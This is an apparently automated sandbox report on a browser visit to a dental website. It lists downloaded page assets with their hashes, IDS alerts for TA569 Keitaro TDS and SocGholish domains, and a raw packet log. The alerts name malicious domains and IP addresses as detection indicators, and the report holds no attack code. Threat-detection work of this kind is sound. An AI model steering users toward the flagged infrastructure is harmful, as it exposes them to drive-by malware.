                                                                                                                                      Preview:wOF2......KP....... ..J..............................&..n.`?STATZ..@..8........h.....>..6.$..x. ..\..c....C.........u?.2..=KE.l.@.i....k..1l..CD.E...(>...n....J.@..^,K|2rSB...I.._.u.mC.........32...T..,<h....wM...6.6p.ox..{...;.C.;d........C..0..q....$. ./.....dr."..d........;?.o..}......>.s.1.......9E...(k.kt.m.hVi..UU.....J.v..s.l..U..Pw.N..9....<..U.*..^7.i.q..0l...[......~g...Z$.W..^..&_.*..v.`...Q......T,PA1..I.AQP@E...=..i..\_.n........kW.K.....9D.\.....&..] ...[.-.u.0.P..)}A]....efT.f..d~..R..}`...*....4.R.A..w..C,g..74.B.<k.B..'.Deb..uB.uR&.;.W)e[......3...|I...e.I..8.%8G..i......7...B"4......X..).....3/R.<.^'....e(...}.....\.@....A*...0...;,q.$%.....!.....NT..9../..1t.W.].n..(.uw.*..E.)......o.b..o.......$.2.D.Tj..?.......h)5.....~VCS/g.O,..{...L..\....2....bv.s.XS@@...*`....1..R...#.._...7.A&a.1b.q.....!.....)T.b.Zc..b.....b2..?.......?0.M.!`i....s..:)3%...R".:=2<.....@!.c......4.[..@v.@0?..........~....j.{R2w6a........Q.7.......:.....,.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (30343)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):30344
                                                                                                                                      Entropy (8bit):4.71081887626325
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:bu5yWeTUKW+KlkJ5de2UYDyVfwYUas2l8yQ/8dwmaU8G:klr+Klk3Yi+fwYUf2l8yQ/e9vf
                                                                                                                                      MD5:36082410DF2EF7F83932219089DC1443
                                                                                                                                      SHA1:7961402D7D01E19387FE609A38454B0BC8C6CCA4
                                                                                                                                      SHA-256:5B9573E1023DA775390E9284EC0EB1C606DF9B468A28980055B4A6AA804F4350
                                                                                                                                      SHA-512:806FF5B14991E42523541D89A18EB295C4BC3DD7C7E9895068EF083A898DBE928D3852638CF106D0A646617E773CA2084B439659B41B3125B7E4FCA1D2D81FB1
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://use.fontawesome.com/releases/v4.7.0/css/font-awesome-css.min.css
                                                                                                                                      Preview:.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.28571429em;text-align:center}.fa-ul{padding-left:0;margin-left:2.14285714em;list-style-type:none}.fa-ul>li{position:relative}.fa-li{position:absolute;left:-2.14285714em;width:2.14285714em;top:.14285714em;text-align:center}.fa-li.fa-lg{left:-1.85714286em}.fa-border{padding:.2em .25em .15em;border:solid .08em #eee;border-radius:.1em}.fa-pull-left{float:left}.fa-pull-right{float:right}.fa.fa-pull-left{margin-right:.3em}.fa.fa-pull-right{margin-left:.3em}.pull-right{float:right}.pull-left{float:left}.fa.pull-left{margin-right:.3em}.fa.pull-right{margin-left:.3em}.fa-spin{-webkit-animation:fa-spin 2s infinite linear;animation:fa-spin 2s infinite linear}
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (18860)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):19033
                                                                                                                                      Entropy (8bit):5.211984400364365
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:++vdXksbdN1izO5GdN7fHw7FInxiviMduz+zQvDHlxGSjkd/9jPTcCen1cnMG:T17bd7iq07ftxivbuzGQvBx1jknrTcbM
                                                                                                                                      MD5:6383A57BAA1479E8490A42F4184B7F0B
                                                                                                                                      SHA1:A7E89FA1896EC8AFCA2A442B792C9AA29E5823DD
                                                                                                                                      SHA-256:5292E677FE712C80863414E9E73F3678D86D409F751392B6803B70A949FC1017
                                                                                                                                      SHA-512:2C2358B3B8C7ECE766A1CE9A75F96B860A6AD1C266ABC7F0409AB7202081BA4F01285C00D0F2FAA5581570A1677CD734749F94985A79B18BE31BE8E3961EE75C
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.11.0/umd/popper.min.js
                                                                                                                                      Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=window.getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e||-1!==['HTML','BODY','#document'].indexOf(e.nodeName))return window.document.body;var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:window.document.documentElement}function p(e){var t=e.nodeName;return'BODY'!==t&&('HTML'===t||r(e.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1758x1000, components 3
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):154921
                                                                                                                                      Entropy (8bit):7.9776507446006
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:koBl3HBYdHyOpguo+Zr+9yDwf4eewiMlKvzUq3pB54kH6+I:7BlIpbi9yDM4UxlVC754kH7I
                                                                                                                                      MD5:B40B1ECA181D5FB3445DAB091876B1FC
                                                                                                                                      SHA1:C93B4DA3502F62C86A446120A27BD59CD4EFE8F3
                                                                                                                                      SHA-256:E955B7796999093B904E59E6C10A7BA84B0B577D57093645CDA898673A62729A
                                                                                                                                      SHA-512:5C570F751491D83DA802C3968E49F70E479440FDE48340CAC6666C63AD9C92D4F04180913AAE055BFB6C50E6BCDA3C34918325AD0347DA6B713FE50BE2C8CAC4
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/surgery.jpg
                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417" xmpMM:DocumentID="xmp.did:34156EFA0CC511E7AF8A8F58BC2A26C9" xmpMM:InstanceID="xmp.iid:34156EF90CC511E7AF8A8F58BC2A26C9" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:fa498863-10d5-4515-bd36-a009af8faf23" stRef:documentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 557 x 57, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):5128
                                                                                                                                      Entropy (8bit):7.656295310067977
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:fSWknmWIbv/3tJFQH+HNTUmABUNzp7v9mCtEN827B4Hkl9BrRuK:fSWkn7eNUmfb7lk8kBP9x
                                                                                                                                      MD5:2FD49EAC264B1AA4701B91390B747575
                                                                                                                                      SHA1:20AC1543470AAAE6883414A1AF9DE6975ADF00B7
                                                                                                                                      SHA-256:B7529946B4E5DBBEFB8898F89E0359CB13B3DAD34BC4330085A8CD1C66D128D4
                                                                                                                                      SHA-512:55C4D059D8D04A974F540243C1B6CF6562667C8E1516ED7F42B84864677622FF15B390B027F54E5FA3EEB1DA0D48AD6A3A0F38A4223469D90657EA3C84A3648C
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/uploads/2021/06/Exodontia-Homepage-01-copy.png
                                                                                                                                      Preview:.PNG........IHDR...-...9......1......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.0 (Macintosh)" xmp:CreateDate="2021-06-08T16:50:47+01:00" xmp:ModifyDate="2021-06-08T16:51:15+01:00" xmp:MetadataDate="2021-06-08T16:51:15+01:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:4056bbd2-a2e9-4e19-b455-88155b0325cd" xmpMM:DocumentID="adobe:docid:photoshop:f35e13c7-a04b-b449-b653-3c9565e418e0
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 18596, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):18596
                                                                                                                                      Entropy (8bit):7.989078131275449
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:N9616suAEefcSnWT6L+OVeMGQmKktwqvtWYBVBZbSx:N961EAEe/WT6iOwMGQmPwSDVBZK
                                                                                                                                      MD5:7DF096BF02FEA4B3015CACD5A0F55D89
                                                                                                                                      SHA1:744744A5460C8F15EDD2CA1C69582495A14772A3
                                                                                                                                      SHA-256:E9805BBA45F978EC5BD76C6AE1441B0E1506C08123CCD2EF0FC4A09C04A45DD2
                                                                                                                                      SHA-512:DC4C41FC8DC40E8F28DAA110877D6D301365C99F50AC23B8B0A3836859906626AFA3AE71D1693DC08F8331BAFDBC6AA4F4D9360B6B13F03CFFDBEE10D02CE62E
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/opensans/v40/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWSwewJER.woff2
                                                                                                                                      Preview:wOF2......H...........H<.........................l..j....`?STATZ..<..8........X..!..`..6.$..<. ..\..S.....v5x.%+........,..(.....<..OI.2d%...l0....Z.....]..L....).F.ne..".....a=C.0.#.......#t.J...W.n}t..U.l.....#..o...,....?......t.T:..~....w.O....0j...|..t..{..l.C0........r.....%Ma......~..d.....V!.)bD^4.s].Y....k.Va.ey....lS7..B....&.6&.dJH.D....bb`...^...c.G.{..{..j$....C...0}.LQm....k`......b......U...Q..;..........y.N.O............y..T../. .u*..\.n.4.j...=.3...D6..l.$.GO~tW.y.p\.....k;umz..S..*.l..6?5.p..(.t^);.-....H.d.U.K|...2T.*......6T..C6......iZ.B3Q.~..BQ..G..2..e)/.239..x.4.yW.w..+....=.@!..N.c.... ..tzB..I ..P....LM...H...G9..O....{....q..g0.3.%.....0.8.......P. ..*..S...)@.<G..K'..;.\U*.t..P.M.....@...+....@....!9s...I1"R:|.U.<f7c........3.n,....6b5!......$.:pX.~....l.*.c{@0....j>.i.A..V.~J.Z....cQ17.1_...%.2e1.~..HV..S!c8.p..~.......".^.A_w...t..ct.{......k..pH.vk.D.v8..H\n......04.y.....v.?4Y......h...K.p......1
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (2343)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):52916
                                                                                                                                      Entropy (8bit):5.51283890397623
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                      MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                      SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                      SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                      SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://www.google-analytics.com/analytics.js
                                                                                                                                      Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1126
                                                                                                                                      Entropy (8bit):7.759869593332356
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:2KF9y2x+OGQBLPT6dHkA2AANI6rkYYrY2dW1o9RxFUc7lzwVQ:2iy2j/BL+dNITgYYrY91acYNr
                                                                                                                                      MD5:54B9EA24E227E755A7CFC3C94AAAF196
                                                                                                                                      SHA1:E7A667DBD3CDDF26E6CC1410A76A25BC8B43F653
                                                                                                                                      SHA-256:33D4C34F099388ACC98EB590A9A7789EEE130855A96D45D355D461925BFDF54B
                                                                                                                                      SHA-512:2B9A9E702DF920918B793B76F0C2C0C8D7EF9F191CD483E5B1CE2EBEF0EFDACD45FB67B44774690B098D81B204F462283FCA82DD74DA9D48A34B86E9A7845927
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[..0..1...*.;........W@R.P.q....Tp..... >.HV.....[.,4.......$...v.^S.XB_A......v:..I.......\.....n.0.[...............a.zp.0..>......u.8.G^.#.....uL..r8K7".#..>..I#.9.Bw..k.M".7C..#.....jY...G.t+ui...'....D.O......?.<x...6`Q..........~....J[+....o..B.+.."ct.(.~...........T...._ .B...2..#.......C.>..q.. b...){..;...q@-y....3.,.....p.p.EN.."....U\...FZ.y...?...a-{.0.A...p....hHB...p...jL.B..C.. .1n..d.X..[.8...yl.3/.5I ......A.....p...-.........<k=..;.b..`L..U...............UgW....:W.a8...4O..).O.....<sQ.[....__.....S*~.lkh..*b....!.Wa...*..k4.....*.T.r.l.%.\_.r..\.y.`.\..\....C...M.V}S.9.s"qM......7..n.y.j.v..+L..`8.)x.....R....*.dRH...@Y........b.......Qr*."....`T....&.Q.3..^..R.G.W.?..|.+.\3..[%(.....+`e....L".....u...S...:7...hH*.q...N.h..Z.I...[a..7Z...Y.A#.........Dk.s.Xu......J...~..Ys.7........A#.1.pZ.....g..fx....../.{.Cu.7...*H.Fk.qsk....s..&D.8..Z....A.Z...
                                                                                                                                      No static file info
                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                      04/24/24-12:12:27.557478TCP2051078ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com)49706443192.168.2.1631.41.44.109
                                                                                                                                      04/24/24-12:12:26.633474UDP2051077ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (funcallback .com)6531253192.168.2.161.1.1.1
                                                                                                                                      04/24/24-12:14:23.723220TCP2051078ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com)49923443192.168.2.1631.41.44.109
                                                                                                                                      04/24/24-12:12:39.865257UDP2051077ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (funcallback .com)5335253192.168.2.161.1.1.1
                                                                                                                                      04/24/24-12:14:01.687724UDP2051077ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (funcallback .com)6140953192.168.2.161.1.1.1
                                                                                                                                      04/24/24-12:13:00.595648TCP2051078ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com)49731443192.168.2.1631.41.44.109
                                                                                                                                      04/24/24-12:12:34.835077TCP2051078ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com)49716443192.168.2.1631.41.44.109
                                                                                                                                      04/24/24-12:14:16.500346TCP2050722ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (gspiceyl .com)49915443192.168.2.1631.41.44.109
                                                                                                                                      04/24/24-12:14:01.687584UDP2051077ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (funcallback .com)5407253192.168.2.161.1.1.1
                                                                                                                                      04/24/24-12:14:06.016494UDP2050098ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (debasesingle .life)5337353192.168.2.161.1.1.1
                                                                                                                                      04/24/24-12:14:16.496004TCP2051024ET TROJAN SocGholish Domain in TLS SNI (stake .libertariancounterpoint .com)49914443192.168.2.16185.158.251.240
                                                                                                                                      04/24/24-12:12:45.920377TCP2051078ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com)49727443192.168.2.1631.41.44.109
                                                                                                                                      04/24/24-12:14:06.571531TCP2050722ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (gspiceyl .com)49876443192.168.2.1631.41.44.109
                                                                                                                                      04/24/24-12:14:06.014789UDP2051023ET TROJAN SocGholish Domain in DNS Lookup (stake .libertariancounterpoint .com)5922653192.168.2.161.1.1.1
                                                                                                                                      04/24/24-12:14:06.016644UDP2050098ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (debasesingle .life)5515453192.168.2.161.1.1.1
                                                                                                                                      04/24/24-12:12:27.558200TCP2051078ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com)49707443192.168.2.1631.41.44.109
                                                                                                                                      04/24/24-12:14:06.015121UDP2050719ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (gspiceyl .com)5547353192.168.2.161.1.1.1
                                                                                                                                      04/24/24-12:14:12.313427TCP2051078ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com)49896443192.168.2.1631.41.44.109
                                                                                                                                      04/24/24-12:12:26.633270UDP2051077ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (funcallback .com)5520453192.168.2.161.1.1.1
                                                                                                                                      04/24/24-12:12:39.864927UDP2051077ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (funcallback .com)5835153192.168.2.161.1.1.1
                                                                                                                                      04/24/24-12:14:11.547342TCP2051024ET TROJAN SocGholish Domain in TLS SNI (stake .libertariancounterpoint .com)49892443192.168.2.16185.158.251.240
                                                                                                                                      04/24/24-12:12:45.921271TCP2051078ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com)49728443192.168.2.1631.41.44.109
                                                                                                                                      04/24/24-12:14:06.015009UDP2050719ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (gspiceyl .com)5338453192.168.2.161.1.1.1
                                                                                                                                      04/24/24-12:14:06.170267TCP2051024ET TROJAN SocGholish Domain in TLS SNI (stake .libertariancounterpoint .com)49874443192.168.2.16185.158.251.240
                                                                                                                                      04/24/24-12:12:34.834756TCP2051078ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com)49715443192.168.2.1631.41.44.109
                                                                                                                                      04/24/24-12:14:01.884129TCP2051078ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com)49851443192.168.2.1631.41.44.109
                                                                                                                                      04/24/24-12:14:06.014671UDP2051023ET TROJAN SocGholish Domain in DNS Lookup (stake .libertariancounterpoint .com)5540553192.168.2.161.1.1.1
                                                                                                                                      04/24/24-12:14:26.818073TCP2050722ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (gspiceyl .com)49929443192.168.2.1631.41.44.109
                                                                                                                                      04/24/24-12:14:26.818278TCP2051024ET TROJAN SocGholish Domain in TLS SNI (stake .libertariancounterpoint .com)49928443192.168.2.16185.158.251.240
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Apr 24, 2024 12:12:27.557147026 CEST49706443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:27.557192087 CEST4434970631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:27.557259083 CEST49706443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:27.557477951 CEST49706443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:27.557498932 CEST4434970631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:27.557888031 CEST49707443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:27.557919025 CEST4434970731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:27.557995081 CEST49707443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:27.558199883 CEST49707443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:27.558211088 CEST4434970731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:28.618271112 CEST4434970631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:28.618700981 CEST49706443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:28.618741035 CEST4434970631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:28.622489929 CEST4434970631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:28.622617006 CEST49706443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:28.623311996 CEST4434970731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:28.623433113 CEST49706443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:28.623630047 CEST4434970631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:28.623637915 CEST49707443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:28.623660088 CEST4434970731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:28.623718977 CEST49706443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:28.623737097 CEST4434970631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:28.625386000 CEST4434970731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:28.625524998 CEST49707443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:28.626214981 CEST49707443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:28.626298904 CEST4434970731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:28.665590048 CEST49706443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:28.681473970 CEST49707443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:28.681498051 CEST4434970731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:28.729454994 CEST49707443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:28.986407995 CEST4434970631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:28.986547947 CEST4434970631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:28.986841917 CEST49706443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:28.987551928 CEST49706443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:28.987598896 CEST4434970631.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:29.056869984 CEST49707443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:29.100130081 CEST4434970731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:29.408881903 CEST4434970731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:29.409001112 CEST4434970731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:29.409065008 CEST49707443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:29.409657955 CEST49707443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:12:29.409684896 CEST4434970731.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:31.498284101 CEST49710443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:31.498337030 CEST44349710142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:31.498416901 CEST49710443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:31.498681068 CEST49710443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:31.498696089 CEST44349710142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:31.860651016 CEST44349710142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:31.860949039 CEST49710443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:31.860975027 CEST44349710142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:31.862377882 CEST44349710142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:31.862445116 CEST49710443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:31.863640070 CEST49710443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:31.863702059 CEST44349710142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:31.915450096 CEST49710443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:31.915458918 CEST44349710142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:31.963466883 CEST49710443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:32.011811018 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                      Apr 24, 2024 12:12:32.314476013 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                      Apr 24, 2024 12:12:32.922451019 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                      Apr 24, 2024 12:12:33.955342054 CEST49710443192.168.2.16142.250.141.106
                                                                                                                                      Apr 24, 2024 12:12:33.996120930 CEST44349710142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:34.127489090 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                      Apr 24, 2024 12:12:34.403548956 CEST4968980192.168.2.16192.229.211.108
                                                                                                                                      Apr 24, 2024 12:12:34.737761021 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:34.737806082 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:34.737881899 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:34.739677906 CEST49713443192.168.2.1652.165.165.26
                                                                                                                                      Apr 24, 2024 12:12:34.739696980 CEST4434971352.165.165.26192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:34.757566929 CEST44349710142.250.141.106192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:34.757633924 CEST44349710142.250.141.106192.168.2.16
